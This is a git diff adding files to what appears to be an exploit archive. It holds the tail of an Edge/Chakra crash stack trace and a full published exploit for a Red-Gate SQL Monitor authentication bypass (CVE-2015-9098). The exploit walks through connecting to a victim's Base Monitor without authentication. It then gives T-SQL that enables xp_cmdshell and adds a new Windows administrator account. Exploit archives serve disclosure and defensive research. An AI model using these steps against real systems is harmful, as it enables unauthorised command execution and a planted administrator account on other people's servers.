+5a 0000004d`4482a140 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
+5b 0000004d`4482a180 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
+5c 0000004d`4482a1c0 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
+5d 0000004d`4482a1f0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
+5e 0000004d`4482a2d0 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
+5f 0000004d`4482a3b0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
+60 0000004d`4482a470 00007ffe`83cf90a3 0x000001fa`1cf7057e
+61 0000004d`4482a500 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
+62 0000004d`4482a550 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
+63 0000004d`4482a5b0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
+64 0000004d`4482a6a0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
+65 0000004d`4482a710 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
+66 0000004d`4482a7b0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
+67 0000004d`4482a840 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
+68 0000004d`4482a8e0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
+69 0000004d`4482a930 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
+6a 0000004d`4482a970 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
+6b 0000004d`4482aaf0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
+6c 0000004d`4482ab70 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
+6d 0000004d`4482acd0 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
+6e 0000004d`4482ad10 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
+6f 0000004d`4482afe0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
+70 0000004d`4482b030 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
+71 0000004d`4482b1a0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
+72 0000004d`4482b1e0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
+73 0000004d`4482b2f0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
+74 0000004d`4482b450 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
+75 0000004d`4482b4d0 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
+76 0000004d`4482b500 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
+77 0000004d`4482b600 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
+78 0000004d`4482b640 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
+79 0000004d`4482b680 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
+7a 0000004d`4482b6b0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
+7b 0000004d`4482b790 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
+7c 0000004d`4482b870 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
+7d 0000004d`4482b930 00007ffe`83cf90a3 0x000001fa`1cf7057e
+7e 0000004d`4482b9c0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
+7f 0000004d`4482ba10 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
+80 0000004d`4482ba70 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
+81 0000004d`4482bb60 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
+82 0000004d`4482bbd0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
+83 0000004d`4482bc70 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
+84 0000004d`4482bd00 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
+85 0000004d`4482bda0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
+86 0000004d`4482bdf0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
+87 0000004d`4482be30 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
+88 0000004d`4482bfb0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
+89 0000004d`4482c030 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
+8a 0000004d`4482c190 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
+8b 0000004d`4482c1d0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
+8c 0000004d`4482c4a0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
+8d 0000004d`4482c4f0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
+8e 0000004d`4482c660 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
+8f 0000004d`4482c6a0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
+90 0000004d`4482c7b0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
+91 0000004d`4482c910 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
+92 0000004d`4482c990 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
+93 0000004d`4482c9c0 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
+94 0000004d`4482cac0 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
+95 0000004d`4482cb00 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
+96 0000004d`4482cb40 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
+97 0000004d`4482cb70 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
+98 0000004d`4482cc50 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
+99 0000004d`4482cd30 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
+9a 0000004d`4482cdf0 00007ffe`83cf90a3 0x000001fa`1cf7057e
+9b 0000004d`4482ce80 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
+9c 0000004d`4482ced0 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
+9d 0000004d`4482cf30 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
+9e 0000004d`4482d020 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
+9f 0000004d`4482d090 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
+a0 0000004d`4482d130 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
+a1 0000004d`4482d1c0 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
+a2 0000004d`4482d260 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
+a3 0000004d`4482d2b0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
+a4 0000004d`4482d2f0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
+a5 0000004d`4482d470 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
+a6 0000004d`4482d4f0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
+a7 0000004d`4482d650 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
+a8 0000004d`4482d690 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
+a9 0000004d`4482d960 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
+aa 0000004d`4482d9b0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
+ab 0000004d`4482db20 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
+ac 0000004d`4482db60 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
+ad 0000004d`4482dc70 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
+ae 0000004d`4482ddd0 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
+af 0000004d`4482de50 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
+b0 0000004d`4482de80 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
+b1 0000004d`4482df80 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
+b2 0000004d`4482dfc0 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
+b3 0000004d`4482e000 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
+b4 0000004d`4482e030 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
+b5 0000004d`4482e110 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
+b6 0000004d`4482e1f0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
+b7 0000004d`4482e2b0 00007ffe`83cf90a3 0x000001fa`1cf7057e
+b8 0000004d`4482e340 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
+b9 0000004d`4482e390 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
+ba 0000004d`4482e3f0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
+bb 0000004d`4482e4e0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
+bc 0000004d`4482e550 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
+bd 0000004d`4482e5f0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
+be 0000004d`4482e680 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
+bf 0000004d`4482e720 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
+c0 0000004d`4482e770 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
+c1 0000004d`4482e7b0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
+c2 0000004d`4482e930 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
+c3 0000004d`4482e9b0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
+c4 0000004d`4482eb10 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
+c5 0000004d`4482eb50 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
+c6 0000004d`4482ee20 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
+c7 0000004d`4482ee70 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
+c8 0000004d`4482efe0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
+c9 0000004d`4482f020 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
+ca 0000004d`4482f130 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
+cb 0000004d`4482f290 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
+cc 0000004d`4482f310 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
+cd 0000004d`4482f340 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
+ce 0000004d`4482f440 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
+cf 0000004d`4482f480 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
+d0 0000004d`4482f4c0 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
+d1 0000004d`4482f4f0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
+d2 0000004d`4482f5d0 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
+d3 0000004d`4482f6b0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
+d4 0000004d`4482f770 00007ffe`83cf90a3 0x000001fa`1cf7057e
+d5 0000004d`4482f800 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
+d6 0000004d`4482f850 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
+d7 0000004d`4482f8b0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
+d8 0000004d`4482f9a0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
+d9 0000004d`4482fa10 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
+da 0000004d`4482fab0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
+db 0000004d`4482fb40 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
+dc 0000004d`4482fbe0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
+dd 0000004d`4482fc30 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
+de 0000004d`4482fc70 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
+df 0000004d`4482fdf0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
+e0 0000004d`4482fe70 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
+e1 0000004d`4482ffd0 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
+e2 0000004d`44830010 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
+e3 0000004d`448302e0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
+e4 0000004d`44830330 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
+e5 0000004d`448304a0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
+e6 0000004d`448304e0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
+e7 0000004d`448305f0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
+e8 0000004d`44830750 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
+e9 0000004d`448307d0 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
+ea 0000004d`44830800 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
+eb 0000004d`44830900 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
+ec 0000004d`44830940 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
+ed 0000004d`44830980 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
+ee 0000004d`448309b0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
+ef 0000004d`44830a90 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
+f0 0000004d`44830b70 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
+f1 0000004d`44830c30 00007ffe`83cf90a3 0x000001fa`1cf7057e
+f2 0000004d`44830cc0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
+f3 0000004d`44830d10 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
+f4 0000004d`44830d70 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
+f5 0000004d`44830e60 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
+f6 0000004d`44830ed0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
+f7 0000004d`44830f70 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
+f8 0000004d`44831000 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
+f9 0000004d`448310a0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
+fa 0000004d`448310f0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
+fb 0000004d`44831130 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
+fc 0000004d`448312b0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
+fd 0000004d`44831330 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
+fe 0000004d`44831490 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
+ff 0000004d`448314d0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
+-->
\ No newline at end of file
diff --git a/platforms/windows/webapps/42444.txt b/platforms/windows/webapps/42444.txt
new file mode 100755
index 000000000..c7f11f170
--- /dev/null
+++ b/platforms/windows/webapps/42444.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Red-Gate SQL Monitor authentication bypass
+# Version: Redgate SQL Monitor before 3.10 and 4.x before 4.2
+# Date: 2017-08-10
+# Red-Gate made a security announcement and publicly released the fixed version more than two years before this exploit was published
+# Vendor Advisory: http://www.red-gate.com/products/dba/sql-monitor/entrypage/security-vulnerability
+# Software Link: ftp://support.red-gate.com/patches/SqlMonitorWeb/09Apr2015/SQLMonitorWeb.exe
+# Exploit Author: Paul Taylor / Foregenix Ltd
+# Website: http://www.foregenix.com/blog
+# Tested on: SQLMonitor 4.1.2.404, SQLMonitor 4.1.0.2226
+# CVE: CVE-2015-9098
+
+1. Description
+
+A remote attacker can gain unauthenticated access to the Base Monitor, resulting in the ability to execute arbitrary SQL commands on any monitored Microsoft SQL Server machines. If the Base Monitor is connecting to these machines using an account with SQL admin privileges, then code execution on the operating system can result in full system compromise (if Microsoft SQL Server is running with local administrator privileges).
+
+2. Proof of Concept
+
+Fingerprint the Red-Gate SQL monitor version on the target machine, by examining the web page source code on the log in page. E.g. "/static/4.1.0.2226/Content/RedGate.Response.css" implies version 4.1.0.2226.
+
+Download and install the corresponding version of SQL monitor on a test VM. Microsoft SQL Express can be used to get base monitor to work properly, and test out the functionality. Connect the SQL monitor and base monitor together on your test VM machine and log in.
+
+Then browse to "Configuration / Base Monitor connection" and update the Base Monitor computer details to a different Base Monitor IP address and Port number (on the target or victim machine). Click "Change connection". Now you will be connecting to the target Base Monitor without authentication, but with full privileges.
+
+Use Configuration / Custom-metrics / Create, and then provide a Metric name and Description, and enter a T-SQL query. If Base Monitor is running with SQL admin rights, and MS SQL is running with Windows administrator rights, then the following will work:
+
+EXEC sp_configure 'show advanced options', 1;
+RECONFIGURE with override;
+EXEC sp_configure 'xp_cmdshell', 1;
+RECONFIGURE with override;
+EXEC xp_cmdshell 'net user testuser MyLongPassword_1 /add'
+EXEC xp_cmdshell 'net localgroup administrators testuser /add'
+
+Select a SQL server instance (or all instances), and then select "Specify databases" and type: master
+Click "Test metric collection."
+In the popup dialog, ensure the desired instances are ticked, and then click "Test metric collection".
+
+This will execute your SQL query with the rights of the Base Monitor SQL user, and any xp_cmdshell with the rights of the service account in use by MSSQL.
+
+The return value will contain an error, because the result is not an integer, but you should be able to see some of the xp_cmdshell command response in the error, e.g. "Unable to convert.... The command completed successfully"
+
+3. Solution:
+   
+Update to latest version of Red-Gate SQL monitor
\ No newline at end of file